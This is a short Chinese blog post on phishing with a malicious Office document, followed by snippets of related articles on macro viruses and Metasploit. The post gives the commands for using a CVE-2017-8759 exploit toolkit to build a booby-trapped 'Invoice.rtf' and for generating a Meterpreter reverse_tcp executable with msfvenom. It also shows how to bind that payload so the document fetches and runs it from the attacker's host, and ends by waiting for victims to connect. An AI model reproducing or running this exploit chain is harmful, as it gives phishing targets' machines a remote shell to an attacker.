msf宏钓鱼

最新推荐文章于 2023-09-13 10:30:00 发布
最新推荐文章于 2023-09-13 10:30:00 发布
阅读量309 收藏 3
点赞数
文章标签: python shell linux docker git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/118565076
版权

kali下载python脚本,生成rtf文件:

下载脚本:git clone https://github.com/bhdresh/CVE-2017-8759.git

生成rtf文件:

python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.8.131/logo.txt

0

利用msfvenom生成木马

生成exe:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1133 -f exe > /root/shell.exe

0

捆绑木马:

python cve-2017-8759_toolkit.py -M exp -e http://192.168.8.124/shell.exe -l /root/shell.exe

0

启动监听,等待钓鱼上线

0

0
洋洋cc
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4399
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
ThePayloadGhostv2:生成util msfvenom
03-26
的有效负载幽灵 您必须解压缩Images.zip文件,然后将其移动到Images文件夹中的路径:/ usr / share。 您之前应该已经对该文件夹授予了权限。 如果愿意,可以将tph启动器移动到/ bin或/ usr / bin。 如果不是,请尝试手动下载以下依赖项: Java的: 关键工具: Jarsigner: Metasploit框架: Apktool: 实用程序Linux: Information Options the payload ghost is a program to generate -w WhatsApp msfvenom payloads but with a very curious end -f Face
CobaltStrike之钓鱼shellcode 实验详细
HAKUNAMATATATTA的博客
02-01 1272
通过该实验了解CS的office钓鱼,端口转发及shellcode生成
红队简单钓鱼实战---office
LvHLong的博客
05-30 1401
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office介绍 是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成,当在工作时,就可以直接利用事先编好的自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 病毒是一种常见的计算机病毒,......
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
CFS初试-MSF
qq_44657899的博客
07-28 347
# 网段查询 meterpreter > run get_local_subnets meterpreter > ipconfig # 添加路由 # 在全局给指定的session增删路由 route add 192.168.11.0 255.255.255.0 1 #在session1中添加到达192.168.11.0网段的路由 route del 192.168.12.0 255.255.255.0 2 #在session2中删除到达192.168.12.0网段的路由
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
红蓝对抗钓鱼篇之从入门到放弃
xnxqwzy的博客
09-13 170
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。
cname解析教程_3分钟,免费拥有你的专属域名——免费一级域名注册申请及域名解析教程...
weixin_34163313的博客
12-18 5237
一、一级域名免费注册申请网址:https://www.freenom.com优点:12个月免费域名,域名后缀为.tk/.ml/.ga/.cf/.gq遇到的问题1:开始登陆不成功解决方法:直接验证邮箱,一个不成功,另换一个邮箱。遇到的问题2:添加域名解析时,name值输入@,显示 Wild cards are not allowed!(这个是系统问题)解决方法:用腾讯云DNSPod管理DN...
CC00012.CloudJenkins——|CI/CD&GitLab配置 .V02|——|GitLab.Server&Https配置|
yanqi_vip
03-27 105
一、gitlab server 配置——https ### --- gitlab配置https(缺少配置) ### --- https配置说明 ~~~ 如果想要以上的 https 方式正常生效使用, ~~~ 则需要把 letsencrypt 自动生成证书的配置打开, ~~~ 这样在执行重新让配置生效命令 (gitlab-ctl reconfigure)...
完美,竟然用一个脚本就把系统升级到https了,且永久免费!
Java笔记虾
07-08 861
作者:猿话www.toutiao.com/i6674393673007890957现在很多站长都会考虑将自己的站点从http升级到https,不仅是基于安全的考虑,有的也是因为第三方平台...
Office生成病毒配合msf+cobaltstrike夺取主机控制权
洞若观火
10-08 6005
启动cobaltstrike服务端并连接 #msfdb init   //初始化msf数据库 进入cobaltstrike目录下 #./teamsercer <本机ip> <设置连接密码> 生成payload 选择名为456的监听端口,x64 名为12345的监听端口,x86提权时会失败 点击复制 打开word文档 视图-->-->查看 设置...
Metasploit之病毒攻击演示
KEY0NE的个人博客
11-02 1186
摘要:利用metasploit生成病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:受害机:win10(192.168.8.123) 攻击机:kali(192.168.8.131)攻击演示:1、生成能反弹会话的病毒代码use windows/meterpreter/reverse_tcp set lhost 192...
Metasploit文件目录与入侵基本概念
si1ence的博客
07-26 2123
漏洞利用基本概念   漏洞(vulerability) 漏洞指一个软件或者硬件安全漏洞,攻击者可以利用这个漏洞攻陷系统,可以是一个弱密码也可以是一个CVE编号系统漏洞。 漏洞攻击(exploit) 黑客利用一个安全缺陷进入系统当中,本质上就是一些恶意的代码数据包,借助这些代码黑客可以入侵某台机器。 攻击载荷(payload) 攻击载荷是在漏洞攻击成功之后,方便我们控制这个系统。 S...
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 10万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
渗透工具之msf
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
MSF钓鱼渗透攻击原理
最新发布
05-26
MSF钓鱼渗透攻击主要分为以下几个步骤: 1. 伪造欺骗性信息:攻击者利用社交工程学原理,伪造看似真实的邮件、网站等信息,以诱导目标用户点击链接或下载文件。 2. 植入木马或后门程序:一旦目标用户点击链接或下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值